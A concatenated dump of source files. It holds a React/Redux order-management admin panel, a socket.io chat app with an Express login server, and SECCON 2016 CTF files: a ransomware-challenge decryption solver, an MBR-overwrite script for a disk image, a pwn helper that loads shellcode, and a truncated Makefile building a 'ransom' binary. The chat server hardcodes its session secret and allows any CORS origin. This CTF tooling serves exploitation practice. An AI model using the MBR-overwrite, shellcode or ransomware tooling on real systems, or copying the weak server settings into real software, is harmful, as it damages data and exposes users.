export const GET_AGENT_BYID = 'GET_AGENT_BYID';
export const GET_AGENT_PRODUCT_LIST = 'GET_AGENT_PRODUCT_LIST';
// Redux thunk: load a page of agents into the store. A 401 means the
// session expired, so the shared expiry action is dispatched instead.
export function getAgentList(params) {
  return async (dispatch) => {
    const result = await get(API.agentList, params);
    if (!result) {
      return;
    }
    if (result.status === 200) {
      dispatch({ type: GET_AGENT_LIST, data: result.data });
    } else if (result.status === 401) {
      dispatch(authUserExpire);
    }
  }
}
// Redux thunk: load one agent by id (payload sits at result.data.data).
// Dispatches the session-expiry action on a 401.
export function getAgentById(id) {
  return async (dispatch) => {
    const result = await get(`${API.getAgentById}/${id}`);
    if (!result) {
      return;
    }
    if (result.status === 200) {
      dispatch({ type: GET_AGENT_BYID, data: result.data.data });
    } else if (result.status === 401) {
      dispatch(authUserExpire);
    }
  }
}
// POST a new agent; resolves to the response body on HTTP 200, else undefined.
export async function addAgent(params) {
  const result = await post(API.addAgent, params);
  return result && result.status === 200 ? result.data : undefined;
}
// PUT an agent update.
// Fix: this previously used `API.putAgent`, which is not defined in the API
// table (only `updateAgent` exists), so the request URL was `undefined`.
export async function putAgent(params) {
  const result = await put(API.updateAgent, params);
  if (result && result.status === 200) {
    return result.data;
  }
}
// DELETE one agent by id; resolves to the response body on HTTP 200.
export async function deleteAgentById(id) {
  const result = await deleted(`${API.deleteAgentById}/${id}`);
  if (!result || result.status !== 200) {
    return undefined;
  }
  return result.data;
}
// PUT an agent update; resolves to the response body on HTTP 200.
export async function updateAgent(params) {
  const result = await put(API.updateAgent, params);
  return result && result.status === 200 ? result.data : undefined;
}
// POST a batch of agent-product assignments; resolves to the body on HTTP 200.
export async function agentProduct(params) {
  const result = await post(API.agentProduct, params);
  if (!result || result.status !== 200) {
    return undefined;
  }
  return result.data;
}
// Redux thunk: load a page of one agent's products into the store;
// dispatches the session-expiry action on a 401.
export function getAgentProductList(params) {
  return async (dispatch) => {
    const result = await get(API.agentProductList, params);
    if (!result) {
      return;
    }
    if (result.status === 200) {
      dispatch({ type: GET_AGENT_PRODUCT_LIST, data: result.data });
    } else if (result.status === 401) {
      dispatch(authUserExpire);
    }
  }
}
// Batch-delete products for one agent; the agent id is substituted into the
// {agentId} placeholder of the URL template defined in the API table.
export async function deleteAgentProduct(agentId, params) {
  const url = API.delectAgentProduct.replace(/{agentId}/, agentId);
  const result = await post(url, params);
  return result && result.status === 200 ? result.data : undefined;
}
<file_sep>
import { formatDateSecond, formatYuan } from '../../../utils/utils';
import { nullString, PAYMENT_METHOD, ORDER_STATUS, REGIST_CHANNEL } from '../../../utils/constant';
// antd Table column definitions for the order list page. Every renderer
// falls back to the shared null placeholder when the value is missing.
const columns = [
  {
    title: '订单编号',
    dataIndex: 'id',
    key: 'id',
    align: 'center',
    // Pinned to the left edge of the horizontally scrolling table.
    fixed: 'left',
    render: (text) => text || nullString,
  },
  {
    title: '提交时间',
    dataIndex: 'createdTime',
    key: 'createdTime',
    align: 'center',
    render: (text) => text ? formatDateSecond(text) : nullString,
  },
  {
    title: '用户账号',
    dataIndex: 'accountId',
    key: 'accountId',
    align: 'center',
    render: (text) => text || nullString,
  },
  {
    // Amounts pass through formatYuan (cents -> yuan, per its name).
    title: '订单金额(元)',
    dataIndex: 'orderAmountPayable',
    key: 'orderAmountPayable',
    align: 'center',
    render: (text) => formatYuan(text) || nullString,
  },
  {
    title: '代理商',
    dataIndex: 'agentId',
    key: 'agentId',
    align: 'center',
    render: (text) => text || nullString,
  },
  {
    title: '返点金额(元)',
    dataIndex: 'rebateTotal',
    key: 'rebateTotal',
    align: 'center',
    render: (text) => formatYuan(text) || nullString,
  },
  {
    title: '支付方式',
    dataIndex: 'paymentMethod',
    key: 'paymentMethod',
    align: 'center',
    render: (text) => PAYMENT_METHOD[text] || nullString,
  },
  {
    title: '订单来源',
    dataIndex: 'registChannel',
    key: 'registChannel',
    align: 'center',
    render: (text) => REGIST_CHANNEL[text] || nullString,
  },
  {
    title: '订单状态',
    dataIndex: 'status',
    key: 'status',
    align: 'center',
    render: (text) => ORDER_STATUS[text] || nullString,
  },
];
export default columns;
<file_sep>import React from 'react';
import { Link } from 'react-router-dom';
import { connect } from 'react-redux';
import { Card, Form, Row, Col, Input, Select, DatePicker, Table, Button, Divider, message, Modal } from 'antd';
import { ORDER_OPERATE, formItemLayout, showTotal, ORDER_STATUS, REGIST_CHANNEL, formItemLayout3 } from '../../utils/constant';
import { getOrderList, updateOrder } from '../../action/order';
import OrderForm from './orderForm';
import listColumns from './columns/list';
import './index.css'
const FormItem = Form.Item;
const { Option } = Select;
const { RangePicker } = DatePicker;
const dateFormat = 'YYYY/MM/DD';
@connect(({ order }) => ({
orderList: order.orderList
}), {
getOrderList
})
@Form.create()
// Order list page: search form, paginated order table, and a modal that
// collects express-shipping info when an order is moved to "shipped".
export default class OrderList extends React.PureComponent {
  constructor(props) {
    super(props);
    // Static columns plus an operation column whose action label depends on
    // the order's current status (ORDER_OPERATE maps status -> label).
    this.columns = [
      ...listColumns,
      {
        title: '操作',
        dataIndex: 'operate',
        key: 'operate',
        align: 'center',
        fixed: 'right',
        render: (text, record) => {
          return (
            <div>
              <Link to={`/order/detail/${record.id}`}>查看</Link>
              {ORDER_OPERATE[record.status] ? (
                <span>
                  <Divider type="vertical" />
                  <a onClick={() => this.updateStatus(record)} href="javascript:;">{ORDER_OPERATE[record.status]}</a>
                </span>
              ) : null}
            </div>
          )
        }
      },
    ];
  }
  state = {
    selectedRowKeys: [],
    loading: false,
    pagination: {
      showSizeChanger: true,
      showQuickJumper: true,
    },
    visible: false,
    // Order currently being shipped via the express-info modal.
    orderId: undefined,
  };
  componentDidMount() {
    this.getOrderList();
  }
  // Validate the search form, convert the RangePicker value into
  // beginTime/endTime strings, and fetch a page of orders.
  getOrderList = async (params) => {
    this.setState({ loading: true });
    this.props.form.validateFields(async(err, values) => {
      if (!err) {
        const { createTime, ...newParams } = values;
        const beginTime = values.createTime ? values.createTime[0].format('YYYY-MM-DD') : undefined;
        const endTime = values.createTime ? values.createTime[1].format('YYYY-MM-DD') : undefined;
        await this.props.getOrderList({ ...newParams, ...params, beginTime, endTime});
        this.setState({ loading: false });
      } else {
        this.setState({ loading: false });
      }
    });
  }
  handleSubmit = (e) => {
    e.preventDefault();
    this.getOrderList();
  }
  onSelectChange = (selectedRowKeys) => {
    this.setState({ selectedRowKeys });
  }
  handleReset = () => {
    this.props.form.resetFields();
  }
  handleTableChange = (pagination) => {
    const pager = { ...this.state.pagination };
    pager.current = pagination.current;
    pager.pageSize = pagination.pageSize;
    this.setState({ pagination: pager });
    this.getOrderList({
      limit: pagination.pageSize,
      page: pagination.current,
    });
  }
  // Confirm handler of the "备注订单" modal: submit the express info and move
  // the pending order (state.orderId) to status '2'.
  // NOTE(review): `orderDetail` is not supplied by the @connect mapping above
  // (only `orderList` is), so `account.id` looks like it is always undefined
  // here — confirm where orderDetail is meant to come from.
  handleOk = async (e) => {
    const { orderDetail = {} } = this.props;
    const { orderId } = this.state;
    const account = orderDetail.account ? orderDetail.account: {};
    this.orderForm.props.form.validateFields(async(err, values) => {
      if (!err) {
        const result = await updateOrder({
          id: orderId,
          accountId: account.id,
          ...values,
          status: '2',
        });
        if (result && result.code === 0) {
          this.getOrderList();
          this.setState({
            visible: false,
          });
          message.success('快递信息录入成功');
        } else {
          message.error('快递信息录入失败,请稍后重试');
        }
      }
    });
  }
  // Advance an order to its next status: '0' -> '4', '1' -> '2' (routed
  // through the express-info modal instead of updating directly),
  // '2' -> '3'; anything else falls back to '0'.
  updateStatus = async ({ id, accountId, status }) => {
    let nextStatus = '0';
    switch (status) {
      case '0': nextStatus = '4';
        break;
      case '1': nextStatus = '2';
        break;
      case '2': nextStatus = '3'
        break;
      default: nextStatus = '0';
    }
    if (status === '1') {
      // Shipping requires the express form first; handleOk finishes the update.
      this.setState({ orderId: id });
      this.showModal();
      return;
    }
    const result = await updateOrder({
      id,
      accountId,
      status: nextStatus,
    });
    if (result && result.code === 0) {
      message.success(`订单ID为${id}的产品${ORDER_OPERATE[status]}变更成功`);
      const pager = { ...this.state.pagination };
      this.getOrderList({
        limit: pager.pageSize,
        page: pager.current,
      });
    } else {
      message.error('产品状态变更失败,请稍后重试');
    }
  }
  showModal = () => {
    this.setState({
      visible: true,
    });
  }
  handleCancel = () => {
    this.setState({
      visible: false,
    });
  }
  render() {
    const { form: { getFieldDecorator }, orderList } = this.props;
    const { selectedRowKeys, loading } = this.state;
    const rowSelection = {
      selectedRowKeys,
      onChange: this.onSelectChange,
    }
    return (
      <div className="page-list order-list">
        {/* getCurrent hands back the wrapped form instance for handleOk. */}
        <Modal
          title="备注订单"
          visible={this.state.visible}
          onOk={this.handleOk}
          onCancel={this.handleCancel}
        >
          <OrderForm getCurrent={(node) => { this.orderForm = node }} />
        </Modal>
        <Card bordered={false} className="form-container">
          <Form onSubmit={this.handleSubmit}>
            <Row gutter={12}>
              <Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
                <FormItem {...formItemLayout} label="订单编号">
                  {getFieldDecorator('expressTrackingNo')(
                    <Input placeholder="请输入订单编号" />
                  )}
                </FormItem>
              </Col>
              <Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
                <FormItem {...formItemLayout} label="订单状态">
                  {getFieldDecorator('status')(
                    <Select allowClear placeholder="请选择订单状态">
                      {Object.keys(ORDER_STATUS).map(item => (
                        <Option key={item} value={item}>{ORDER_STATUS[item]}</Option>
                      ))}
                    </Select>
                  )}
                </FormItem>
              </Col>
              <Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
                <FormItem {...formItemLayout} label="订单来源">
                  {getFieldDecorator('registChannel')(
                    <Select allowClear placeholder="请选择订单来源">
                      {Object.keys(REGIST_CHANNEL).map(item => (
                        <Option key={item} value={item}>{REGIST_CHANNEL[item]}</Option>
                      ))}
                    </Select>
                  )}
                </FormItem>
              </Col>
              <Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
                <FormItem {...formItemLayout} label="用户账户">
                  {getFieldDecorator('phoneNumber')(
                    <Input placeholder="请输入用户手机" />
                  )}
                </FormItem>
              </Col>
              <Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
                <FormItem {...formItemLayout} label="代理商">
                  {getFieldDecorator('agentId')(
                    <Input placeholder="请输入代理商" />
                  )}
                </FormItem>
              </Col>
              <Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
                <FormItem {...formItemLayout} label="提交起止时间">
                  {getFieldDecorator('createTime')(
                    <RangePicker format={dateFormat} />
                  )}
                </FormItem>
              </Col>
            </Row>
            <Row>
              <Col xs={{ span: 8, push: 16 }} sm={{ span: 12, push: 12 }} lg={{ span: 8, push: 16 }} style={{ textAlign: 'center' }}>
                <Button type="primary" htmlType="submit">搜索</Button>
                <Button
                  style={{ marginLeft: '8px', marginRight: '8px' }}
                  onClick={this.handleReset}
                >
                  清空
                </Button>
              </Col>
            </Row>
          </Form>
        </Card>
        <Card bordered={false}>
          <Table
            rowKey="id"
            scroll={{ x: 1100 }}
            rowSelection={rowSelection}
            columns={this.columns}
            dataSource={orderList.records}
            onChange={this.handleTableChange}
            pagination={{ showTotal: showTotal, total: orderList.total, ...this.state.pagination }}
            loading={loading}
          />
        </Card>
      </div>
    )
  }
}
<file_sep>import React from 'react';
import { formatDateSecond } from '../../../utils/utils';
import { nullString, SKY_TYPE } from '../../../utils/constant';
// antd Table column definitions for the skylight (banner) listing.
const columns = [
  {
    title: '天窗ID',
    dataIndex: 'skyId',
    key: 'skyId',
    align: 'center',
  },
  {
    title: '天窗类型',
    dataIndex: 'skyType',
    key: 'skyType',
    align: 'center',
    // Unknown codes fall back to the shared null placeholder.
    render: (text) => SKY_TYPE[text] || nullString
  },
  {
    title: '天窗标题',
    dataIndex: 'skyTitle',
    key: 'skyTitle',
    align: 'center',
  },
  {
    title: '天窗位置',
    dataIndex: 'position',
    key: 'position',
    align: 'center',
  },
  {
    // skyContent is used as an image URL here — presumably banners store
    // their picture in this field; confirm against the backend model.
    title: '天窗图片',
    dataIndex: 'skyContent',
    key: 'skyContent',
    align: 'center',
    render: (text) => <img style={{ display: 'block' }} width="50" height="50" src={text} alt="产品图片" />
  },
  {
    title: '创建时间',
    dataIndex: 'createTime',
    key: 'createTime',
    align: 'center',
    render: (text) => text ? formatDateSecond(text) : nullString
  },
  {
    title: '创建人',
    dataIndex: 'creator',
    key: 'creator',
    align: 'center',
  },
];
export default columns;
<file_sep>import { formatDateMinute } from '../../../utils/utils';
import { nullString, USER_ACCOUNT_STATUS } from '../../../utils/constant';
// antd Table column definitions for the user account listing.
const columns = [
  {
    title: '用户账号',
    dataIndex: 'phoneNumber',
    key: 'phoneNumber',
    align: 'center',
  },
  {
    title: '姓名',
    dataIndex: 'name',
    key: 'name',
    align: 'center',
  },
  {
    // NOTE(review): rendered as the raw code — other tables map this field
    // through REGIST_CHANNEL; confirm whether that mapping belongs here too.
    title: '用户来源',
    dataIndex: 'registChannel',
    key: 'registChannel',
    align: 'center',
  },
  {
    title: '用户状态',
    dataIndex: 'status',
    key: 'status',
    align: 'center',
    render: (text) => USER_ACCOUNT_STATUS[text] || nullString
  },
  {
    title: '注册时间',
    dataIndex: 'createTime',
    key: 'createTime',
    align: 'center',
    render: (text) => text ? formatDateMinute(text) : nullString
  },
];
export default columns;
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { getUserInfo } from '../../action/auth';
@connect(({ auth }) => ({
userInfo: auth.userInfo,
}), {
getUserInfo,
})
// Landing page: greets the signed-in admin by username.
// NOTE(review): getUserInfo is mapped in the @connect above but never
// invoked in this component — presumably the surrounding layout fetches the
// user info; confirm, otherwise the greeting renders without a name.
export default class Home extends React.PureComponent {
  render() {
    const { userInfo = {} } = this.props;
    const { sysUser = {} } = userInfo;
    return (
      <div>{sysUser.username},欢迎来到快易布业务管理系统!</div>
    )
  }
}
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Form, Icon, Input, Button, message } from 'antd';
import { authUserLogin } from '../../action/auth';
import './index.css';
const FormItem = Form.Item;
@connect(null, { authUserLogin })
@Form.create()
// Login page: username/password form submitted as an OAuth password grant.
export default class NormalLoginForm extends React.Component {
  // Validate the form, dispatch the login thunk, and redirect to the home
  // page when the thunk resolves truthy.
  handleSubmit = (e) => {
    e.preventDefault();
    this.props.form.validateFields(async (err, values) => {
      if (!err) {
        // Extra fields required by the OAuth token endpoint.
        const data = {
          ...values,
          grant_type: 'password',
          scope: 'server',
        }
        const result = await this.props.authUserLogin(data);
        if (result) {
          message.success('登录成功,欢迎来到快易布管理系统!');
          this.props.history.push('/')
        }
      }
    });
  }
  render() {
    const { getFieldDecorator } = this.props.form;
    return (
      <div className="login-page">
        <h4>快易布业务管理系统</h4>
        <Form onSubmit={this.handleSubmit} className="login-form">
          <FormItem>
            {getFieldDecorator('username', {
              rules: [{ required: true, message: '请输入用户名' }],
            })(
              <Input prefix={<Icon type="user" style={{ color: 'rgba(0,0,0,.25)' }} />} placeholder="请输入用户名" />
            )}
          </FormItem>
          <FormItem>
            {getFieldDecorator('password', {
              rules: [{ required: true, message: '请输入密码' }],
            })(
              <Input prefix={<Icon type="lock" style={{ color: 'rgba(0,0,0,.25)' }} />} type="password" placeholder="请输入密码" />
            )}
          </FormItem>
          <FormItem>
            <Button type="primary" htmlType="submit" className="login-form-button">登录</Button>
          </FormItem>
        </Form>
      </div>
    );
  }
}
| c11e0a98faef87044a582654634083181ccc1a59 | [
"JavaScript",
"SQL",
"Markdown"
] | 55 | JavaScript | yangyunxin/react-website | 430271972ba79497a2ab73758b408825aab2b1c4 | 4d1da8595cb861647ee42e18a32676b0b9d2141b |
refs/heads/master | <repo_name>OnsagerHe/chat_online<file_sep>/server/Dockerfile
FROM node:12-alpine
#docker build -f Dockerfile .
#docker run -it -d 3000:3000 6a5f66e92f76
WORKDIR /app
COPY . /app
RUN npm install
EXPOSE 8080
CMD [ "npm", "start" ]
<file_sep>/server/src/Routes/Auth/Auth.js
const db = require('../../config/set_db')
const bcrypt = require('bcrypt')
const express = require('express')
const saltRounds = 10;
let router = express.Router()
router
.route("/register")
.post(async (req, res) => {
const username = req.body.username;
const password = req.body.password;
bcrypt.hash(password, saltRounds, (err, hash)=> {
if (err) {
console.log(err);
}
db.query(
"INSERT INTO users (username, password) VALUES (?,?)",
[username, hash],
(err, result) => {
console.log(err);
}
);
});
})
router
.route("/login")
.post( async(req, res) => {
const username = req.body.username;
const password = <PASSWORD>;
await db.query(
"SELECT * FROM users WHERE username = ?;",
username,
(err, result) => {
if (err) {
res.send({ err: err });
}
if (result.length > 0) {
bcrypt.compare(password, result[0].password, (error, response) => {
if (response) {
req.session.user = result;
console.log(req.session.user);
res.send(result);
} else {
res.send({ message: "Wrong username/password combination!" });
}
});
} else {
res.send({ message: "User doesn't exist" });
}
}
);
})
.get( (req, res) => {
if (req.session.user) {
res.send({ loggedIn: true, user: req.session.user });
} else {
res.send({ loggedIn: false });
}
})
module.exports = router
<file_sep>/client/Dockerfile
FROM node:12-alpine
#docker run -it -p 3000:3000 6a5f66e92f76
WORKDIR /app
COPY . /app
RUN npm install
RUN npm install axios
EXPOSE 3000
CMD [ "npm", "start" ]
<file_sep>/client/src/chat/ChannelList.js
import React from 'react';
import Axios from "axios";
import { Channel } from './Channel';
let newChannel = ''
const channelAdd = async () => {
Axios.post("http://localhost:3001/channelAdd", {
username: newChannel
})
};
export class ChannelList extends React.Component {
handleClick = id => {
this.props.onSelectChannel(id);
}
constructor(props) {
super(props);
this.state = {value: ''};
this.handleChange = this.handleChange.bind(this);
this.handleSubmit = this.handleSubmit.bind(this);
}
handleChange(event) {
this.setState({value: event.target.value});
}
handleSubmit(event) {
newChannel = this.state.value;
event.preventDefault();
}
render() {
let list = <div className="no-content-message">There is no channels to show</div>;
if (this.props.channels && this.props.channels.map) {
list = this.props.channels.map(c => <Channel key={c.id} id={c.id} name={c.name} participants={c.participants} onClick={this.handleClick} />);
}
return (
<div className='channel-list'>
<form onSubmit={this.handleSubmit} onClick={channelAdd}>
<label>
<input type="text" value={this.state.value} onChange={this.handleChange} />
</label>
<input type="submit" value="Submit" />
</form>
{list}
</div>);
}
}
/*
constructor(props) {
super(props);
this.state = {value: ''};
this.handleChange = this.handleChange.bind(this);
this.handleSubmit = this.handleSubmit.bind(this);
}
handleChange(event) {
this.setState({value: event.target.value});
}
handleSubmit(event) {
newChannel = this.state.value;
event.preventDefault();
}
*/
/*
<form onSubmit={this.handleSubmit} onClick={channelAdd}>
<label>
<input type="text" value={this.state.value} onChange={this.handleChange} />
</label>
<input type="submit" value="Submit" />
</form>
*/
<file_sep>/server/src/server.js
var app = require('express')();
var http = require('http').createServer(app);
const PORT = 8080;
var io = require('socket.io')(http);
const test = require("express");
const cors = require("cors");
const bodyParser = require("body-parser");
const cookieParser = require("cookie-parser");
const session = require("express-session");
var STATIC_CHANNELS = [{
name: 'First Channel',
participants: 0,
id: 1,
sockets: []
}, {
name: 'Second Channel',
participants: 0,
id: 2,
sockets: []
}];
var id = 3;
var array = []
app.use((req, res, next) => {
res.setHeader('Access-Control-Allow-Origin', '*');
next();
})
http.listen(PORT, () => {
console.log(`listening on *:${PORT}`);
});
io.on('connection', (socket) => { // socket object may be used to send specific messages to the new connected client
console.log('new client connected');
socket.emit('connection', null);
socket.on('channel-join', id => {
console.log('channel join', id);
STATIC_CHANNELS.forEach(c => {
if (c.id === id) {
if (c.sockets.indexOf(socket.id) == (-1)) {
c.sockets.push(socket.id);
c.participants++;
io.emit('channel', c);
}
} else {
let index = c.sockets.indexOf(socket.id);
if (index != (-1)) {
c.sockets.splice(index, 1);
c.participants--;
io.emit('channel', c);
}
}
});
return id;
});
socket.on('send-message', message => {
io.emit('message', message);
console.log(message)
});
socket.on('disconnect', () => {
STATIC_CHANNELS.forEach(c => {
let index = c.sockets.indexOf(socket.id);
if (index != (-1)) {
c.sockets.splice(index, 1);
c.participants--;
io.emit('channel', c);
console.log("Disconnect Client")
}
});
});
});
app.get('/getChannels', (req, res) => {
res.json({
channels: STATIC_CHANNELS
})
});
const tmp = test();
tmp.use(test.json());
tmp.use(
cors({
origin: ["http://localhost:3000"],
methods: ["GET", "POST"],
credentials: true,
})
);
tmp.use(cookieParser());
tmp.use(bodyParser.urlencoded({ extended: true }));
tmp.use(
session({
key: "userId",
secret: "subscribe",
resave: false,
saveUninitialized: false,
cookie: {
expires: 60 * 60 * 24,
},
})
);
const routeAuth = require('./Routes/Auth/Auth')
tmp.post("/channelAdd", (req, res) => {
const username = req.body.username;
var tmp = (array.indexOf(username) > -1);
if (!tmp) {
array.push(username)
STATIC_CHANNELS.push({name: JSON.stringify(username), participants: 0, id: id++, sockets: []})
}
console.log(STATIC_CHANNELS)
});
tmp.use(routeAuth)
tmp.listen(3001, () => {
console.log("running server in " + 3001);
});
| 2d3b115638d3d67764e78b9f472fb0cfcbfe98d7 | [
"JavaScript",
"Dockerfile"
] | 5 | Dockerfile | OnsagerHe/chat_online | a42822fd8517388088ff0071f7d9564b431cf946 | 431eca16b6f1868f8cf38e6fccca8fa3cbb54cd7 |
refs/heads/master | <repo_name>emmeiwhite/firebase-auth<file_sep>/scripts/index.js
// 1) Let get our Guides an show then on the home page
const guideList = document.querySelector('#guide-list');
const getGuides = (guides) => {
if (guides.length >= 1) {
guideList.innerHTML = '';
let counter = 1;
guides.forEach(guide => {
const html = `
<div class="card">
<div class="card-header">
<h2 class="mb-0">
<button class="btn btn-block text-left" type="button" data-toggle="collapse" data-target="#collapseOne${counter}"
aria-expanded="true" aria-controls="collapseOne">
${guide.data().title}
</h2>
</div>
<div id="collapseOne${counter}" class="collapse" data-parent="#guide-list">
<div class="card-body">
${guide.data().content}
</div>
</div>
</div>
`;
guideList.innerHTML += html;
counter += 1;
});
} else {
guideList.innerHTML = `<h5 class="text-center font-weight-light">Login to see the Guides</h5>`;
}
};
// 2) Show Menu Links based on user status
const loggedInLinks = document.querySelectorAll('.logged-in');
const loggedOutLinks = document.querySelectorAll('.logged-out');
const showMenuUi = (user) => {
if (user) {
loggedInLinks.forEach(link => (link.style.display = 'block'));
loggedOutLinks.forEach(link => (link.style.display = 'none'));
} else {
loggedInLinks.forEach(link => (link.style.display = 'none'));
loggedOutLinks.forEach(link => (link.style.display = 'block'));
}
}<file_sep>/scripts/auth.js
/* --- 0) listen for auth status changes --- */
auth.onAuthStateChanged(user => {
if (user) {
db.collection('guides').get().then(snapshot => {
getGuides(snapshot.docs);
showMenuUi(user);
})
} else {
getGuides([]); // If user status is logged out we show the message
showMenuUi();
console.log('User logged out !!! ***');
}
});
/* --- 1) user signup ---*/
const signup = document.querySelector('.signup-form');
signup.addEventListener('submit', (e) => {
e.preventDefault();
const email = signup['signup-email'].value;
const password = signup['signup-password'].value;
// Now signing up with Firebase Auth. We use the method provided by the firebase-auth
// auth.createUserWithEmailAndPassword(email,password), and it returns a promise
auth.createUserWithEmailAndPassword(email, password)
.then(cred => {
$('#signup-modal').modal('hide');
signup.reset();
})
.catch(err => {
console.log('ERROR:', err);
});
});
/* --- 2) logout ---*/
const signout = document.querySelector('.signout');
signout.addEventListener('click', (e) => {
e.preventDefault();
auth.signOut();
});
/* --- 3) login a registered user ---*/
const login = document.querySelector('.login-form');
login.addEventListener('submit', (e) => {
e.preventDefault();
const email = login['login-email'].value;
const password = login['login-password'].value;
auth.signInWithEmailAndPassword(email, password)
.then(credential => {
console.log('USER LOGGED IN', credential);
$('#login-modal').modal('hide');
signup.reset();
})
.catch(err => {
console.log('USER NOT Registered', err);
});
});
/* --- 4) --- */ | 4246312c2689ba915a54a52f7ef9ecdd54aa9903 | [
"JavaScript"
] | 2 | JavaScript | emmeiwhite/firebase-auth | 003fac1b07e46dc873fb2de922999af31b228275 | 7610cf37b5c119b38a852ddaa51014e4563ae032 |
refs/heads/master | <repo_name>PinkDiamond1/SECCON2016_online_CTF<file_sep>/Forensic/300_randomware/build/server.sh
#!/bin/sh
sudo php -S 172.17.0.1:80
<file_sep>/Forensic/300_randomware/build/ransom/mbrapp/writedisk.sh
# Write the compiled MBR image into disk.img via qemu's network block device.
# Load the nbd kernel module only if it is not already present.
nbdloaded=`lsmod | grep nbd | wc -l`
if [ $nbdloaded -eq 0 ]; then
	modprobe nbd
fi
# Attach disk.img as /dev/nbd0, overwrite its first sector with ./mbr, detach.
qemu-nbd -c /dev/nbd0 disk.img
dd if=./mbr of=/dev/nbd0
qemu-nbd -d /dev/nbd0
<file_sep>/Forensic/300_randomware/solver/recover.py
# Recover the XOR keystream from a known plaintext/ciphertext pair, then
# decrypt the flag image.  (Python 2: works on byte strings via chr()/ord().)

# Open everything in binary mode: the .enc files and the jpg are raw bytes,
# so text mode would corrupt them on platforms with newline translation.
plain = open('./blocklist.xml', 'rb').read()
enc = open('./blocklist.xml.enc', 'rb').read()
flag_enc = open('./flag.jpg.enc', 'rb').read()
assert len(plain) == len(enc)

# keystream = plaintext XOR ciphertext; the ransomware reuses a 1024-byte key.
key = "".join([chr(ord(p) ^ ord(e)) for p, e in zip(plain, enc)])[:1024]
open('key', 'wb').write(key)

# XOR the encrypted flag with the repeating 1024-byte key.
# join() replaces the original's quadratic `flag += ...` concatenation.
flag = "".join([chr(ord(flag_enc[i]) ^ ord(key[i % 1024]))
                for i in range(len(flag_enc))])
open('flag.jpg', 'wb').write(flag)
<file_sep>/Binary/400_ropsynth/solver/test.sh
#!/bin/sh
../challenge/gadget_generator.py $1 > gadgets.$1
./solve.py gadgets.$1 ropchain.$1
cat gadgets.$1 ropchain.$1 | ./launcher.elf
<file_sep>/Binary/400_ropsynth/solver/pwn.py
import telnetlib
import subprocess
import socket
from socket import AF_INET, AF_UNIX, SOCK_STREAM
import sys
import os
import glob
######################################################################
# embed ipython shell
######################################################################
import IPython
# Expose `ipshell()`: a real embedded IPython shell when running outside
# IPython, otherwise a no-op lambda (avoids nesting shells).
if hasattr(IPython, "get_ipython") and IPython.get_ipython() == None:
    ipshell = IPython.terminal.embed.InteractiveShellEmbed(display_banner=False)
else:
    ipshell = lambda *x,**y: None
######################################################################
# extended socket
######################################################################
class mysocket(socket.socket):
    """socket.socket extended with line-oriented receive helpers.

    Python 2 only: relies on the ``_sock`` constructor argument and on
    print statements.
    """

    def __init__(self, family=AF_INET, type=SOCK_STREAM, proto=0, _sock=None):
        socket.socket.__init__(self, family, type, proto, _sock)

    def recv_until(self, eos):
        # Read one byte at a time until `eos` is seen or the peer closes;
        # returns everything received (including `eos` when found).
        retval = ""
        while True:
            ch = self.recv(1)
            if len(ch) == 1:
                retval += ch
            else:
                break
            if retval.endswith(eos):
                break
        return retval

    def recv_lines(self, num=0, prefix="[{num:>4}] "):
        # Receive and echo up to `num` lines (num<=0: until EOF / partial
        # line).  Each line is printed with a numbered prefix and the
        # concatenation of all lines is returned.
        cnt = 0
        retval = ""
        while num <= 0 or cnt < num:
            linebuf = self.recv_until("\n")
            if len(linebuf) > 0:
                retval += linebuf
                print prefix.format(num=cnt), linebuf,
            if linebuf.endswith("\n") == False:
                # Partial line means the stream ended; flush and stop.
                print
                break
            cnt += 1
        return retval

    def interact(self):
        # Hand the socket over to telnetlib for an interactive session.
        t = telnetlib.Telnet()
        t.sock = self
        t.interact()
def mkproc(args):
    # Spawn `args` as a child process wired to one end of a Unix socketpair
    # and return the other end wrapped in mysocket (Python 2 `_sock` trick).
    sp = socket.socketpair(AF_UNIX, SOCK_STREAM)
    fd = sp[0].makefile("rw")
    subprocess.Popen(args, stdin=fd, stdout=fd, stderr=fd, close_fds=True)
    return mysocket(_sock=sp[1])

def mktcp(addr):
    # Connect a mysocket to the (host, port) tuple `addr` and return it.
    sock = mysocket(AF_INET, SOCK_STREAM)
    sock.connect(addr)
    return sock
######################################################################
# shellcode
######################################################################
# Load every shellcode/*.raw file next to this script into the `shellcode`
# dict, keyed by file name without extension.
shellcode = {}
_scriptdir = os.path.dirname(os.path.abspath(__file__))
_shellcodefiles = os.path.normpath(os.path.join(_scriptdir, "shellcode/*.raw"))
for _fullpath in glob.glob(_shellcodefiles):
    _fname = os.path.splitext(os.path.split(_fullpath)[1])[0]
    with open(_fullpath, "rb") as _f:
        shellcode[_fname] = _f.read()
######################################################################
# other utils
######################################################################
def hexdump(buf):
    """Format `buf` as a classic 16-bytes-per-line hex dump.

    Each full row ends with a newline; a trailing partial row is padded
    with spaces in the hex column and has no trailing newline.
    """
    full_rows, remainder = divmod(len(buf), 16)
    total_rows = full_rows + (1 if remainder else 0)
    out = []
    for row in range(total_rows):
        chunk = buf[row * 16:(row + 1) * 16]
        line = "%06x:" % (row * 16)
        line += "".join(" %02x" % ord(c) for c in chunk)
        # Pad the hex column so the ASCII column stays aligned.
        line += "   " * (16 - len(chunk))
        line += "  "
        line += "".join(
            c if ord(c) >= 0x20 and ord(c) < 0x7f else "." for c in chunk)
        if len(chunk) == 16:
            line += "\n"
        out.append(line)
    return "".join(out)
######################################################################
# test
######################################################################
def test():
    # Smoke test: run `ls -la` through mkproc, hexdump its output,
    # then drop into an interactive shell for exploration.
    sock = mkproc(["/bin/ls", "-la"])
    print hexdump(sock.recv_lines())
    ipshell()

if __name__ =="__main__":
    test()
<file_sep>/Forensic/300_randomware/build/ransom/Makefile
OC = objcopy

.PHONY: all
all: ransom

clean:
	rm -f *.o mbrapp/*.o ransom mbrapp/mbr

# Build the 16-bit MBR payload, embed it into an object file, and link it
# into the 32-bit `ransom` binary.
ransom: main.c
	cd mbrapp && make
	# NOTE(review): each recipe line runs in its own shell, so this
	# `cd ..` is a no-op (the previous `cd mbrapp && make` already
